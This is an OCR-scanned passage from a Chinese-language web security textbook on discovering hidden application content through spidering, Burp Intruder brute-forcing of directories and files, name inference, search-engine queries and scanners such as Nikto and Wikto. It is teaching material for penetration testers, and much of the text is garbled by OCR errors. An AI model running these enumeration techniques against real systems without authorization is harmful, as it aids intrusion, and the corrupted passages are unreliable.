(1) 配置 浏览 器 ， 使 用 Burp 或 WebScarab 作 为 本 地 代理 服务 器 
《如 果 不 确 定 ， 请 参阅 第 20 音 了 解 相 关 信 息 ) o 

C2) 以 常规 方式 浏览 整个 应 用 程序 ， 访 问 发 现 的 每 一 个 链 
接 /URL， 提 交 每 一 个 表单 并 执行 全 部 多 阶段 功能 。 尝 试 在 
JavaScript 激 活 与 禁用 、cookie 激 活 与 禁用 的 情况 下 进行 浏览 。 许 多 
应 用 程序 能 够 处 理 各 种 浏览 器 配置 ， 可 以 获取 应 用 程序 内 的 不 同 内 
容 和 代码 路 径 。 

(3) 检查 由 代理 服务 器 /爬虫 工具 生成 的 站 点 地 图 ， 确 定 手动 
浏览 时 没有 发 现 的 所 有 应 用 程序 内 容 或 功能 。 确 定 爬 虫 如 何 枚 举 每 
一 项 内 容 ， 例 如 ， 在 Burp Spider F, WAEA” (Linked From) 
的 详细 内 容 。 通 过 浏览 器 访问 这 些 内 容 ， 以 使 代理 服务 器 /爬虫 工 
县 检查 服务 器 啊 应 ， 从 而 确定 其 他 所 有 内 容 。 继 续 递 归 执 行 上 述 步 
又， 直到 无 法 再 确定 其 他 内 容 或 功能 。 

(4) 另外 ， 还 可 以 要 求 工具 以 已 经 枚 举 的 所 有 内 容 为 基础 ， 
主动 抓 取 站 点 内 容 。 首 先 ， 请 确定 任何 危险 的 或 可 能 会 中 断 应 用 程 
闻 会 话 的 URL， 并 配置 爬虫 ， 将 它们 排除 在 抓 取 范 围 之 外 。 运 行 朴 
虫 并 检查 它 发 现 的 结果 以 查找 其 他 所 有 内 容 。 














在 代理 服务 器 /爬虫 工具 生成 的 站 点 地 图 中 包含 大 量 关 于 目标 
ae 程序 的 信息 ， 稍 后 可 以 利用 它们 确定 应 用 程序 暴露 的 各 种 受 攻 














应 用 程序 常常 包含 没有 直接 链接 或 无 法 通过 可 见 的 主要 内 容 访 问 的 
内 容 和 功能 。 在 使 用 后 没有 删除 测试 或 调试 功能 就 是 一 个 常见 的 示例 。 
男 一 个 例子 是 ， 应 用 程序 为 不 同类 型 的 用 户 〈 如 匿名 用 户 、 通 过 验 
证 的 第 规 用 户 和 管理 员 〉 提 供 不 同 的 功能 。 在 茶 种 权限 下 对 应 用 程序 进 
行 彻 感 抓 取 的 用 户 会 遗漏 拥有 男 一 种 权限 的 用 户 可 使 用 的 功能 。 发 现 相 





关 功 能 的 攻击 者 可 利用 这 些 功能 提升 其 在 应 用 程序 中 的 权限 。 
oe 还 存在 许多 前 面 描述 的 解析 技巧 无 法 确定 的 重要 内 容 和 功能 ， 如 下 
示 。 

口 备份 文件 。 如 果 使 用 动态 页 面 ， 它 们 的 文件 扩展 名 可 能 已 变 成 不 
2e 展 名 ， 可 通过 审查 页 面 源 代码 查找 可 在 主页 中 加 以 利用 的 
漏洞 o 
口 包 含 Web 根 日 录 下 (或 根 目 录 外 ) 完整 文件 快照 的 备份 档案 ， 可 
以 使 用 它 迅 速 确定 应 用 程序 的 所 有 内 容 与 功能 。 

e Se ee 
新 功能 。 

口 定 制 应 用 程序 中 的 默认 应 用 程序 功能 对 用 户 不 可 见 ， 但 在 服务 器 
端 仍然 可 见 。 

口 尚未 从 服务 器 中 删除 的 旧版 本 文件 。 如 果 使 用 动态 页 面 ， 这 些 文 
AR 
YF] o 

口 配置 和 包含 敏感 数据 〈 如 数据 库 证 书 ) 的 文件 。 

口 编 译 现 有 应 用 程序 功能 的 源 文 件 。 

口 极端 情况 下 ， 源 代码 中 可 能 包含 用 户 名 和 密码 等 信息 ， 但 更 可 能 
提供 有 关 应 用 程序 状态 的 信息 。 如 果菜 个 位 置 出 现 “ 测 试 此 功能 ”(test 
this function) 或 类 似 的 关键 短语 ， 应 立即 从 此 处 开始 探查 漏洞 。 

口 包 侣 有 效用 户 名 、 会 话 令 胜 、 被 访问 的 UREL 以 及 所 执行 操作 等 敏 
感 信 息 的 日 志文 件 。 

发 现 隐藏 的 内 容 需 要 组 合 使 用 自动 和 手动 技巧 ， 而 且 往 往 需 要 一 定 
的 运气 。 

1. MAI 

第 14 章 将 介绍 攻击 者 如 何 利用 目 动 技巧 提高 攻击 应 用 程序 的 效率 。 
现在 可 以 利用 自动 拉 巧 回 Web 服 务 器 提出 大 量 请 求 ， 和 尝试 猜测 隐藏 功能 
的 名 称 或 标识 符 。 

例如 ， 假 设 用 户 指定 的 抓 取 已 经 确定 有 以 下 应 用 程序 内 容 ; 


http://eis/auth/Login 



































http: //eis/auth/ForgotPassword 
http: //eis/home/ 

494 fae 
http://eis/images/eis.gif 


b =e s > Ilanda /ate ase 
http://eis/include/eis.css 


首先 ， 试 图 确定 隐藏 内 容 的 自动 化 工具 将 提出 下 列 请 求 ， 以 定位 其 
录 : 








他 目 


http://eis/About/ 
http://eis/abstract/ 
http://eis/academics/ 
http: //eis/accessibility/ 
http: //eis/accounts/ 
http: //eis/action/ 


Burp Intruder 可 用 于 循环 访问 一 组 第 见 的 目录 名 称 并 收集 服务 器 的 
响应 信息 ， 可 通过 检查 这 些 信 息 来 确定 有 效 的 目录 。 图 4-4 表 示 正 在 配 
置 Burp Intruder 探 得 Web 根 目录 中 的 常见 目录 。 








bup intruder repeater window heip 





1 pasioad postion 

GET /§6/ HTTP?/1.1 

Hoyt: cas 

Ueer-Agent: Bozilia/S.9 (Windows; U; Vindows FT €.1; en-GB; 2¥:1.9.2.13) 
Uecko/ -UU1203 Firetox/s.6.13 

CCSP text/html, applicaticn/xhtmlt+xnl, application/xml:q-0.9, "/*;q"0.9 
Lecepr-Lanquaye: en-gb, en: q*0.5 

Accept-Encoding: gzip,deflate 

Accept-Charset: 150-0055-1,urf-0; qe°0.7,*:qe0." 











图 4-4 配置 Burp Intruder 探 查 常见 目录 


执行 攻击 后 ， 单 击 status 和 lengh 等 标题 栏 会 对 其 中 的 结果 进行 相应 
分 类 ， 有 助 于 迅速 发 现 异常 ， 如 图 4-5 所 示 。 





attack save columns 


Filter: showing all items 


ea 


images 

gb 

home 
server-status 



































User-Agent: Mozilla/5.0 (Windows; U; Vindows NT &.1; en-GB; 
ev:1.9.2.13) Gecko/20101203 Firefox/3.6€.13 

Accept: 

text/html, application/xhtml+xml, application/xml;q=0.9,%*/*:q=0 
-8 

Accept-Language: en-gb,en;q=0.5 











图 4-5 Burp Intruder 显 示 目 录 蛮 力 攻击 结果 





对 目录 和 子 目 录 进 行 蛋 力 攻 击 后 ， 就 可 以 查找 应 用 程序 中 的 其 他 页 
面 。 这 时 ，/auth 目 录 特 别 有 用 ， 其 中 包含 在 抓 取 过 程 中 确定 的 登录 资 
源 ， 对 未 通过 验证 的 攻击 者 而 言 ， 这 可 能 是 一 个 不 错 的 起 点 。 同 样 ， 攻 
击 者 可 以 请 求 该 目录 中 的 一 系列 文件 : 


http: //eis/auth/About/ 

http: //eis/auth/Aboutus/ 

http: //eis/auth/AddUser/ 

http: //eis/auth/Admin/ 

http: //eis/auth/Administration/ 
http: //eis/auth/Admins/ 


此 攻击 的 震 宁 如 图 4-6 所 示 ， 它 确定 了 /auth 目 录 中 的 一 些 资源 : 











GET /auth/Register HTTP/1.1 

Hoot: cig 

Accept: */* 

Accept-Language: en 

User-Agent: Nozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0) 
Connection: closes 

Content-Length: 5 





Login 
Logout 
Register 
Profile 


值得 注意 的 是 ， 针 对 Profile 的 请 求 返回 了 HTTP 状 态 码 302。 这 表示 


如 采 未 经 验证 访问 此 链接 ， 用 户 将 和 被 重 定 癌 到 登录 页 面 。 此 外 ， 虽 然 
Login 页 面 已 在 抓 取 过 程 中 被 发 现 ， 但 Register 页 面 尚 未 被 发 现 。 这 可 能 
说 明 此 功能 可 以 运行 ， 攻 击 者 能 够 在 该 站 点 上 注册 一 个 用 户 账户 。 


— 
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> 注解 不 要 想当然 地 认为 : 如 果 被 请 求 的 资源 存在 ， 应 用 
程序 将 返回 200 OK 响应 ， 否 则 将 返回 404 Not Found 啊 应 。 许 多 应 
用 程序 以 目 定 义 的 方式 处 理 访 问 不 存在 资源 的 请 求 ， 通 常 返 回 一 个 
带 200 啊 应 码 的 预定 义 错 误 消 息 。 而 且 ， 一 些 访问 现存 资源 的 请 求 
可 能 会 收 到 非 200 啊 应 。 下 面 简要 说 明 在 使 用 蛮 力 技巧 查找 隐藏 内 
容 时 可 能 过 到 的 啊 应 码 的 含义 。 

口 302 Found。 如 果 重 定 同 指 同 一 个 登录 页 面 ， 那 么 只 有 通过 
验证 的 用 户 才 能 够 访问 该 资源 ， 如 果 指 同一 个 错误 消 足 ， 就 可 能 披 
圳 其 他 不 同 的 原因 ; 如 果 指 辣 男 一 个 位 置 ， 重 定 同 可 能 属于 应 用 程 
序 特定 逻辑 的 一 部 分 ， 应 深入 分 析 。 

口 400 Bad Request。 应 用 程序 可 能 对 URL 中 的 目录 和 文件 名 使 
用 定制 的 命名 方案 ， 但 特殊 的 请 求 并 不 遵循 该 方案 。 然 而 ， 出 现 这 
人 
rae 

O 401 Unauthorized 或 403 Forbidden。 该 啊 应 通常 表示 被 请 求 的 
资源 存在 ， 但 不 管用 户 的 验证 状态 或 权限 等 级 如 何 ， 禁 止 任何 用 户 
访问 该 资源 。 请 求 目 录 时 往往 会 返回 此 啊 应 ， 可 以 据 此 推 新 所 请 求 
的 目录 确实 存在 。 

口 500 Internal Server Error。 在 查找 内 容 的 过 程 中 ， 该 啊 应 通 篆 
表示 应 用 程序 希望 在 请 求 资 源 时 提交 某 些 参数 。 


由 于 各 种 可 能 的 响应 都 可 表示 存在 菜 些 重要 内 容 ， 因 而 很 难 编写 出 
一 段 完 全 自动 化 的 脚本 来 输出 一 组 有 效 资源 。 最 佳 方法 是 在 使 用 蛋 力 技 
巧 时 尽 可 能 多 地 收集 与 应 用 程序 有 关 的 信息 ， 并 对 其 进行 手动 检查 。 





























渗透 测试 步 又 


(1) 手动 提出 一 些 访问 有 效 与 无 效 资源 的 请 求 ， 并 确定 服务 
器 如 何 处 理 无 效 资源 。 

(2) 使 用 用 户 指 定 的 抓 取 生 成 的 站 点 地 图 作为 自动 查找 隐藏 
内 容 的 基础 。 

(3) 目 动 提出 访问 应 用 程序 内 已 知 存在 的 每 个 目录 或 路 径 中 
常用 文件 名 和 目录 的 请 求 。 使 用 Burp Intruder 或 一 段 定制 脚本 ， 结 
合 和 常用 文件 名 和 目录 词汇 表 ， 迅 速生 成 大 量 请 求 。 如 果 已 经 确定 应 
用 程序 处 理 访 问 无 效 资 源 请 求 的 特定 方式 (如 上 自 定义 的 fe not 
found 页 面 )， 应 配置 Intruder 或 脚本 突出 显示 这 些 结果 ， 以 便 将 其 


忽略 。 

(4) 收集 从 服务 器 收 到 的 啊 应 ， 并 手动 检查 这 些 啊 应 以 确定 
有 效 的 资源 。 

(5) 反复 执行 这 个 过 程 ， 直 到 发 现 新 内 容 。 


2. 通过 公布 的 内 容 进行 推测 

许多 应 用 程序 对 其 内 容 与 功能 使 用 茶 种 命名 方案 。 通 过 应 用 程序 中 
已 经 存在 的 资源 进行 推 晰 ， 可 以 调整 自动 枚 举 操作 ， 提 高 发 现 其 他 隐藏 
内 容 的 可 能 性 。 

请 注意 ， 在 EIS 应 用 程序 中 ，/auth 中 的 所 有 资源 均 以 大 写字 母 开 
头 ， 这 就 是 上 一 菠 的 文件 蛮 力 攻击 中 使 用 的 单词 表 有 意 大 写 的 原因 。 而 
且 ， 既 然 我 们 已 在 /auth 目 录 中 确定 了 一 个 名 为 ForgotPassword 的 页 面 ， 

我 们 就 可 以 在 其 中 搜索 其 他 名 称 类 似 的 项 目 ， 例 如 : 
http://eis/auth/ResetPassword 

此 外 ， 在 用 户 指导 的 抓 取 过 程 中 创建 的 站 点 地 图 确定 了 以 下 资源 : 

http://eis/pub/media/100 

http://eis/pub/media/117 

http://eis/pub/user/11 
其 他 类 似 范围 的 数值 可 用 于 确定 其 他 资源 和 信息 。 




















Q 
”提示 Burp Intruder 高 度 可 定制 化 ， 并 且 可 用 于 针对 HITP 
请 求 的 任何 部 分 。 图 4-7 显 示 了 如 何 使 用 Burp Intruder 对 前 半 部 分 文 
件 名 实施 绰 力 攻击 ， 以 提出 下 列 请 求 : 

http: //eis/auth/AddPassword 

http: //eis/auth/PorgetPassword 

http://eis/auth/GetPassword 

http: //eis/auth/Reset Password 

http: //eis/auth/RetrievePassword 

http://eis/auth/UsdatePassword 








$ burp suite professional 
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Tpayoadposiion 7 
GIT feuth/RePassvord LF/1.1 


Hest: eis 

Accept: */* 

Accept-Language: en 

User-Agent: Botilia/4.0 tcompatibie; MSIE 7.0) Wandows NT €.0) 
Connection: close 
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渗透 测试 步 又 


(1) 检查 用 户 指定 的 浏览 与 基本 盔 力 测试 获得 的 结果 。 编 译 
枚 举 出 的 所 有 子 目录 名 称 、 文 件 词 干 和 文件 扩展 名 列表 。 

(2) 检查 这 些 列 表 ， 确 定 应 用 程序 使 用 的 所 有 命名 方案 。 例 
如 ， 如 果 有 些 页 面 的 名 称 为 AddDocumentjsp 和 ViewDocument.jsp， 
那么 可 能 还 有 叫做 EditDocument.jsp 和 RemoveDocument.jsp 的 页 面 。 
通常 ， 只 需要 得 看 几 个 示例 ， 就 能 推测 出 开发 者 的 命名 习惯 。 根 据 
其 个 人 风格 ， 开 发 者 可 能 采用 各 种 命名 方法 ， 如 元 长 式 
(AddANewUser.asp) 、 人 简洁 式 (AddUser.asp) 、 使 用 缩写 式 
(AddUsr.asp) 或 更 加 模糊 的 命名 方式 CAddU.asp) 。 了 解 开 及 者 
使 用 的 命名 方式 有 助 于 猜测 出 尚未 确定 的 内 容 的 准确 名 称 。 

(3) 有 时 候 ， 不 同 内 容 的 命名 方案 使 用 数字 和 日 期 作为 标识 
符 ， 通 过 它们 可 轻易 推测 出 隐藏 的 内 容 。 静 态 内 容 《〈 而 非 动 态 脚 
K) 常常 采用 这 种 命名 方式 。 例 如 ， 如 果 一 家 公司 的 Web 站 点 含有 
AnnualReport2009.pdf 和 AnnualReport2010.pdf 这 两 个 文件 的 链接 ， 
应 该 可 以 立即 确定 接 下 来 的 报告 名 称 。 令 人 难以 置信 的 是 ， 一 些 公 
司 在 公布 金融 结果 之 前 ， 常 常会 将 包含 金融 信息 的 文件 放 在 Web 服 
务 器 上 ， 有 些 精 明 的 新 闻 记 者 往往 能 够 根据 其 在 前 些 年 使 用 的 命名 
T Rr RRE E 

(4) 检查 所 有 客户 端 代码 ， 如 HTTP 和 JavaScript， 确 定 任何 与 
隐藏 服务 器 端 内 容 有 关 的 线索 。 这 些 代 码 包 括 与 受 保护 或 没有 建立 
链接 功能 有 关 的 HTML 注释 以 及 包含 禁用 SUBMIT 元 素 的 HTML 表 
单 等 。 通 常 ， 注 释 由 生成 Web 内 容 的 软件 自动 生成 ， 或 者 由 应 用 程 
序 运行 的 平台 生成 。 参 考 服务 器 端 包含 文件 之 类 的 内 容 也 特别 有 
用 。 这 些 文件 可 被 公众 下 载 ， 并 且 可 能 包含 高 度 敏感 的 信息 〈 如 数 
据 库 连 接 字 符 串 和 密码 ) 。 另 外 ， 开 发 者 的 注释 中 可 能 包含 各 种 有 
用 的 信息 ， 如 数据 库 名 称 、 后 端 组 件 引 用 、SQL 碍 询 字 符 串 等 。 厚 
客户 端 组 件 〈 如 Java applet 和 ActiveX 控 件 ) 也 可 能 包含 可 供 利用 的 
敏感 数据 。 请 参阅 第 15 章 了 解 应 用 程序 揭示 自身 信息 的 其 他 方式 。 

(5) 把 已 经 枚 举 出 的 内 容 添 加 到 其 他 根据 这 些 列表 项 推测 出 
来 的 名 称 中 ， 并 将 文件 扩展 名 列表 添加 到 txt、bak、src、inc 和 old 这 















































些 常用 扩展 名 中 ， 它们 也 许 E 够 披露 现 有 页 面 备份 版 本 的 来 源 以 及 
与 所 使 用 的 开发 语言 有 关 的 扩展 名 ， 如 . Java 和 |. cs; 这 些 扩 展 名 可 能 
揭示 已 经 被 编译 到 现 有 页 面 的 来 源 文件 (请 参阅 本 章 后 面 的 提示 ， 
了 解 如 何 确定 所 使 用 的 技术 ) 。 

(6) 搜索 开发 者 工具 和 文件 编辑 器 不 经 意 建立 的 临时 文件 。 
例如 .DS_Store 文 件 ， 其 中 包含 一 个 OS XERRI, RA 
file.php~1， 它 是 编辑 file.php 时 临时 创建 的 文件 ， 或 者 大 量 软 件 工 
具 使 用 的 .tmp 文 件 。 

(7) 进一步 执行 自动 操作 ， 结 合 目 录 、 文 件 词 干 和 文件 扩展 
名 列表 请 求 大 量 潜在 的 资源 。 例 如 ， 在 特定 的 目录 中 ， 请 求 每 个 文 
poet Fe“; 或 者 请 求 每 个 目录 名 作为 已 知 目录 的 子 


(8) 如果 确定 应 用 程序 使 用 一 种 统一 的 命名 方案 ， 考 虑 在 此 
基础 上 执行 更 有 针对 性 的 亚 力 测试 。 例 如 ， 如 果 已 知 
AddDocument.jsp 和 ViewDocument.jsp 存 在 ， 束 可 以 建立 一 个 操作 列 
R 编辑、 删除 、 新 建 等 ) 并 请 求 XxxzDocument.jsp。 此 外 ， 还 可 
以 建立 项 目 类 型 〈 有 用户、 账户 、 文 件 等 ) 并 请 求 AddXxx.jsp。 

(9) spear Ge aS ea a an ae alla 
础 ， 反 复 执行 上 述 每 一 个 步 又， 继续 执行 目 动 内 容 查 找 。 所 采取 的 
操作 只 受到 想象 力 、 由 
内 容 的 重要 性 的 限制 。 
































eo 
7 

=> 注解 使 用 Burp Intruder Pro 的 “内 容 查找 ”(Content 
Discovery) 功能 可 以 自动 完成 我 们 迄今 为 止 介绍 的 大 多 数 任 务 。 在 
使 用 浏览 器 手动 解析 应 用 程序 的 可 见 内 容 后 ， 可 以 选择 Burp 站 点 地 
图 的 一 个 或 多 个 分 文 ， 并 对 这 些 分 文 启 动 内 容 人 查找 会 话 。 在 尝试 查 
找 新 内 容 时 ，Burp 使 用 以 下 技巧 : 
口 使 用 内 置 的 和 党 用 文件 名 和 目录 名 列表 实施 蛮 力 攻击 ; 
口 基 于 在 目标 应 用 程序 中 观察 到 的 资源 名 称 动态 生成 单词 表 ; 
口 推断 包含 数字 和 日 期 的 资源 名 称 ; 
口 基于 已 确定 的 资源 测试 其 他 文件 扩展 名 
口 从 查找 到 的 内 容 中 进行 抓 取 ; 
口 自动 识别 有 效 或 无 效 啊 应 ， 以 减少 错误 警报 。 
所 有 操作 均 以 递归 方式 执行 ， 在 发 现 新 的 应 用 程序 内 容 后 ， 将 




















安排 新 的 查找 任务 。 图 4-8 显 示 了 一 个 正在 进行 的 针对 EIS 应 用 程序 
的 内 容 查找 会 话 。 


content discovery httpe//e s/puh/media/ 100 




















图 4-8 一 个 正在 进行 的 针对 EIS 应 用 程序 的 内 容 查 找 会 话 





Vo HK ”在 执行 自动 内 容 查 找 任务 时 ，OWASP 发 起 的 
DirBuster 项 目 也 是 一 个 有 用 的 资源 ， 其 中 包含 大 量 以 出 现 频率 排序 
的 、 在 现实 世界 的 应 用 程序 中 发 现 的 目录 名 列表 。 


3. 利用 公共 信息 

应 用 程序 的 一 些 内 容 与 功能 现在 可 能 并 没有 与 主要 内 容 建立 链接 ， 
但 过 去 曾经 存在 链接 。 在 这 种 情况 下 ， 各 种 历史 记录 中 可 能 仍然 保存 隐 
藏 内 容 的 引用 。 我 们 可 以 利用 两 类 主要 的 公共 资源 查找 隐藏 的 内 容 。 

口 搜 索引 擎 ， 如 Google。 这 些 搜 索引 擎 中 保存 有 其 使 用 的 强大 扑 虫 
所 发 现 的 所 有 内 容 的 详细 目录 ， 并 且 将 这 些 内 容 保存 在 缓存 中 ， 即 使 原 
始 内 容 已 被 删除 ， 绥 存 中 的 内 容 仍然 不 变 。 

口 web 档案， 如 www.archive.org 上 的 WayBack Machine。 这 些 档案 
保存 大 量 Web 站 点 的 历史 记录 。 许 多 时 候 允 许 用 户 浏览 某 个 站 点 从 几 年 
前 到 现在 于 不 同时 期 彻底 复制 的 站 点 快照 。 

除 过 去 已 经 链接 的 内 容 外 ， 这 些 资源 中 还 可 能 包含 第 三 方 站 点 ， 而 























非 目标 应 用 程序 本 身 链接 扩容 的 引用 。 例 如 ， 一 些 应 用 程序 中 包含 仅 可 
由 其 商业 合作 伙伴 使 用 的 限制 性 功能 。 这 些 合作 伙伴 可 能 会 以 应 用 程序 
无 法 预料 的 方式 披露 上 述 功 能 。 


渗透 测试 步 又 


(1) 使 用 几 种 不 同 的 搜索 引擎 和 Web 档 案 但 找 它 们 编 入 索引 
或 保存 的 关于 所 攻击 的 应 用 程序 的 内 容 。 
(2) 查询 搜索 引擎 时 ， 可 以 使 用 各 种 高 级 技巧 提高 搜索 效 
率 。 以 下 建议 适用 于 Google《〈 可 以 在 其 他 引擎 中 选择 “高 级 搜索 ? 找 
到 对 应 的 查询 ) 。 
D site:www.wahh-target.com。 它 将 返回 Google 引 
用 的 每 一 个 目标 站 点 资源 。 
口 site:www.wahh-target.com login。 它 将 返回 所 有 
包含 login 表 达 式 的 页 面 。 在 大 型 而 复杂 的 应 用 程序 
中 ， 这 个 技巧 可 用 于 迅速 定位 感 兴趣 的 资源 ， 如 站 点 
地 图 、 密 码 重 设 功能 、 管 理 菜 单 等 。 
口 link:www.wahh-target.com。 它 将 返回 其 他 Web 
站 点 和 应 用 程序 中 所 有 包含 目标 站 点 链接 的 页 面 。 其 
中 包括 过 去 内 容 的 链接 或 仅 第 三 方 可 用 的 功能 ， 如 合 
作 伙伴 链接 。 
口 related:www.wahh-target.com。 它 将 返回 与 目标 
站 点 “相似 ”的 页 面 ， 因 此 可 能 包含 大 量 无 关 的 资料 。 
但 是 ， 其 中 也 可 能 包含 在 其 他 站 点 与 目标 有 关 的 讨 
论 ， 它 们 可 能 会 有 帮助 。 
(3) 每 次 搜索 时 ， 不 仅 在 Google 的 默认 Web 部 分 进行 搜索 ， 
还 要 搜索 “ 群 组 "和 “新 闻 ” 部 分 ， 它 们 可 能 会 提供 不 同 的 结果 。 
(4) 浏览 到 某 个 查询 搜索 结果 的 最 后 一 个 页 面 ， 并 选择 “将 省 
略 的 结果 纳入 搜索 范围 后 再 重新 搜索 ”。 默 认 情 况 下 ，Google 会 删 
除 结果 中 它 认 为 与 其 他 页 面 非常 相似 的 页 面 ， 过 滤 见 长 的 结果 。 撤 
eee 同 的 页 面 ， 它 们 也 许 有 助 于 攻击 目标 应 
EFF o 
(5) 查看 感 兴趣 页 面 的 缓存 版 本 ， 包 括 任何 不 再 在 应 用 程序 
中 出 现 的 内 容 。 某 些 情况 下 ， 搜 索引 苟 缓存 中 可 能 包含 如 果 未 通过 
号 份 验 证 或 付费 就 无 法 直接 访问 的 资源 。 
(6) 在 属于 相同 组 织 的 其 他 域名 上 执行 相同 的 查询 ， 这 些 域 
名 中 可 能 包含 与 所 攻击 的 应 用 程序 有 关 的 有 用 信息 。 
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能 ， 它 们 可 能 仍然 有 用 。 陈 旧 功 能 中 可 能 包含 应 用 程序 其 他 地 方 并 
不 存在 的 漏洞 。 

即使 陈旧 内 容 已 经 从 现 有 应 用 程序 中 删除 ， 但 是 从 搜索 引擎 组 
存 或 Web 档 案 中 发 现 的 相关 信息 仍然 可 能 包含 与 应 用 程序 现 有 功能 
有 关 的 引用 或 线索 ， 它 们 可 能 有 助 于 攻击 者 癌 其 实施 攻击 。 


开发 人 员 和 其 他 人 在 因特网 论坛 上 发 表 的 帖子 是 提供 目标 应 用 程序 
有 用 信息 的 另 一 个 公共 来 源 。 因 特 网 上 有 大 量 软件 设计 人 员 和 程序 员 在 
其 中 询问 和 回答 技术 问题 的 论坛 。 友 表 在 这 些 论坛 上 的 帖子 通 第 包含 与 
应 用 程序 有 关 的 信息 ， 攻 击 者 可 直接 对 其 加 以 利用 。 这 些 信息 包括 应 用 
程序 使 用 的 技术 、 执 行 的 功能 、 在 开发 过 程 中 遇 到 的 问题 、 已 知 的 安全 
i E RE 








渗透 测试 步 又 


(1) 列 出 所 发 现 的 与 目标 应 用 程序 及 其 开 及 有 头 的 每 一 个 姓 
名 和 电子 邮件 地 址 ， 其 中 应 包括 所 有 已 知 的 开 友 者 、 在 HTML 源 代 
人 码 中 发 现 的 姓名 、 在 公司 主要 Web 站 点 联系 信息 部 分 发 现 的 姓名 以 
及 应 用 程序 本 里 披露 的 所 有 姓名 (如 管理 职员 )。 

(2) 使 用 上 文 描述 的 搜索 技巧 ， 搜 索 发 现 的 每 一 个 姓名 ， 碍 
找 他 们 在 因特网 论坛 上 发 表 的 所 有 问题 和 答案 。 分 析 发 现 的 所 有 信 
恩 ， 了 解 与 目标 应 用 程序 功能 或 漏洞 有 关 的 线索 。 


4. 利用 Web 服 务 器 

Web 服 务 器 层面 存在 的 漏洞 有 助 于 攻击 者 发 现 Web 应 用 程序 中 并 未 
建立 链接 的 内 容 与 功能 。 例 如 ，Web 服 务 器 软件 中 存在 大 量 的 程序 缺 
陷 ， 人 允许 攻击 者 枚 举目 录 的 内 容 ， 或 者 获取 服务 器 可 执行 的 动态 页 面 的 
原始 来 源 (请 参阅 第 18 半 了 解 这 些 漏洞 的 一 些 实例 以 及 确定 漏洞 的 方 
法 ) 。 如 果 应 用 程序 中 存在 上 述 程序 缺陷 ， 攻 击 者 就 可 以 利用 它 直 接 获 
得 应 用 程序 的 所 有 页 面 和 其 他 资源 。 

许多 Web 服 务 占 上 默认 包含 有 助 于 攻击 者 对 其 实施 攻击 的 内 容 。 例 
如 ， 样 本 和 诊断 性 脚本 中 可 能 包含 已 知 的 漏洞 ， 或 者 可 被 用 于 某 些 恶意 
用 途 的 功能 。 而 且 ， 许 多 Web 应 用 程序 整合 了 常用 的 第 三 方 组 件 ， 执 行 
各 种 冲 规 功能 ， 如 购物 车 、 论 坛 或 内 容 管理 系统 (CMS) 功能 。 这 些 功 
能 通 负 安装 在 与 Web 根 目录 或 应 用 程序 的 起 始 目录 相关 的 固定 位 置 。 

本 质 上 ， 自 动 化 工具 非常 适用 于 执行 上 述 任务 ， 许 多 上 自动 化 工具 可 
同一 系列 已 知 的 默认 Web 服 务 嚣 内容、 第 三 方 应 用 程序 组 件 和 常用 目录 
名 称 发 布 请 求 。 虽 然 这 些 工具 无 法 准确 查 明 任何 隐藏 的 预定 义 功能 ， 但 
i epee ier hae 

资源 。 

Wikto 惑 是 许多 能 够 执行 上 述 扫 描 的 免费 工具 中 的 一 个 ， 其 中 还 包 
含 一 个 可 配置 的 蛮 力 攻击 内 容 列 表 。 如 图 4-9 所 示 ， 针 对 Extreme Internet 
Shopping 站 点 进行 扫描 时 ， 它 可 以 使 用 目 己 的 内 部 单词 表 确 定 一 些 目 
录 。 由 于 其 中 包含 一 个 第 用 Web 应 用 程序 软件 和 脚本 的 大 型 数据 库 ， 因 
人 
| 这 些 H JX: 
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图 4-9 ”将 Wikto 用 于 查找 内 容 和 某 些 已 知 的 漏洞 


http://eis/phpmyadmin/ 
此 外 ， 虽 然 /gb 目 录 已 通过 抓 取得 以 确定 ， 但 Wikto 确 定 了 以 下 
URL: 
/gb/index.php?login=true 
Wikto 检 查 该 URL， 是 因为 gbook PHP 应 用 程序 使 用 该 URL， 而 前 者 
包含 一 个 广为人知 的 漏洞 。 


A 警告 ”和 许多 商业 Web 扫 描 器 一 样 ，Nikto 和 Wikto 之 
类 的 工具 包含 大 量 默认 文件 和 目录 列表 ， 因 此 似乎 能 够 很 好 地 完成 
大 量 检查 任务 。 但 是 ， 这 些 检查 大 部 分 都 是 多 余 的 ， 错 误 警 报 也 经 
tA. SERRA AE, BOORAH BCE ARS ei is. ORAS SHA 
本 集合 移 至 其 他 目录 、 或 以 自 定 义 的 方式 处 理 HTTP 状 态 码 ， 还 经 
常会 出 现 漏 报 。 为 此 ， 通 常 最 好 是 使 用 Burp Intruder 等 工具 ， 因 为 
这 类 工具 可 以 解 译 原 始 的 啊 应 信息 ， 并 且 不 会 误 报 或 漏 报 问题 。 





渗透 测试 步 又 


运行 Nikto 时 可 以 参考 以 下 几 点 。 

(1) 如 果 认 为 服务 器 将 Nikto 检 查 的 内 容 保存 在 一 个 非 标准 位 
置 (如 /cgi/cgi-bin 而 非 /cgi-bin〉， 可 以 使 用 -root/cgi/ 选 项 指定 这 个 
Ber ne es erate 
年 位 置 。 

(2) 如 果 站 点 使 用 不 返回 HTTP404 状 态 码 的 fle not found 定 制 
页 面 ， 可 以 指定 一 个 特殊 字符 串 ， 使 用 -404 选 项 标识 这 个 页 面 。 

(3) 注意 ，Nikto 并 不 对 潜在 的 问题 执行 任何 智能 核实 。 因 
此 ， 它 往往 会 做 出 错误 诊断 。 请 手动 核实 由 Nikto 返 回 的 任何 结 
果 。 


需要 注意 ， 在 使 用 Nikto 之 类 的 工具 时 ， 可 以 使 用 域名 或 IP 地 址 
来 指定 目标 应 用 程序 。 如 果菜 工具 使 用 IP 地 址 来 访问 一 个 页 面 ， 则 
此 工具 会 将 该 页 面 上 使 用 域名 的 链接 视 为 属于 不 同 的 域 ， 因 而 不 会 
访问 这 些 链 接 。 这 样 做 是 有 道理 的 ， 因 为 一 些 应 用 程序 属于 虚拟 托 
管 应 用 程序 ， 有 多 个 域名 共享 同一 个 耳 地 址 。 因 此 ， 在 配置 相关 工 
有 具 时 ， 请 记 住 上 述 事实 。 




















4.1.4 应 用 程序 页 面 与 功能 路 径 


迄今 为 止 ， 我 们 讨论 的 枚 举 技巧 实际 上 由 如 何 概念 化 和 分 类 Web 应 
用 程序 内 容 这 种 特殊 的 动机 暗中 推动 。 这 种 动机 源 自 于 Web 应 用 程序 出 
现 之 前 的 万 维 网 时 代 ， 当 时 的 Web 服 务 器 是 静态 信息 仓库 ， 人 们 使 用 实 
际 为 文件 名 的 URL 获 取 这 类 信息 。 要 公布 Web 内 容 ， 只 需 简单 生成 一 批 
